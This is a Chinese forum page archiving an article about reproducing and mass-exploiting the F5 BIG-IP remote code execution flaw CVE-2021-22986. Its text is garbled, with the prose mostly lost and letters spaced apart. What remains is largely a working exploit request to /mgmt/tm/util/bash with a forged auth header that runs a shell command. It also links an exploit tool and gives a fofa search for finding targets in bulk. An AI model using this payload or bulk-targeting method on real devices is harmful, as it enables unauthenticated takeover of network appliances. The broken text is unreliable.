搜索

[7549] 2021-03-29_脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用

文档创建者:s7ckTeam
浏览次数:28
最后更新:2025-01-17
2021-03-29_脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用 ( C V E - 2 0 2 1 - 2 2 9 8 6 ) F 1 2 s e c   2 0 2 1 - 0 3 - 2 9   F 5 - R C E p o c     . A P T
h t t p s : / / l o g i n . f 5 . c o m / r e s o u r c e / r e g i s t e r E m a i l . d o  
o v a m a c V M w a r e   F u s i o n   P r o
r o o t d e f a u l t c o n f i g   i p
p o c c o o k i e r c e X - F 5 - A u t h - T o k e n :   A u t h o r i z a t i o n :   B a s i c   Y W R t a W 4 6 Q V N h c 1 M = 1 6 . 0 . 0
p o c P O S T   / m g m t / t m / u t i l / b a s h   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 0 . 1 0 5 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 1 5 ;   r v : 8 6 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 8 6 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 X - F 5 - A u t h - T o k e n :   A u t h o r i z a t i o n :   B a s i c   Y W R t a W 4 6 Q V N h c 1 M = C o n t e n t - L e n g t h :   4 7 A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 , z h - T W ; q = 0 . 7 , z h - H K ; q = 0 . 5 , e n - U S ; q = 0 . 3 , e n ; q = 0 . 2 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e R e f e r e r :   h t t p s : / / 1 9 2 . 1 6 8 . 0 . 1 0 3 / t m u i / l o g i n . j s p U p g r a d e - I n s e c u r e - R e q u e s t s :   1 {   " c o m m a n d " : " r u n " ,   " u t i l C m d A r g s " : " - c   i d " }
D i y h t t p s : / / g i t h u b . c o m / t a n g x i a o f e n g 7 / T S L a b - E x p l o i t i d e a   T o o l s
i f
e x p l o i t - f 5 _ r c e   n e w
f o f a 使 使 f o f a i c o n _ h a s h = " x x x x x x "
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理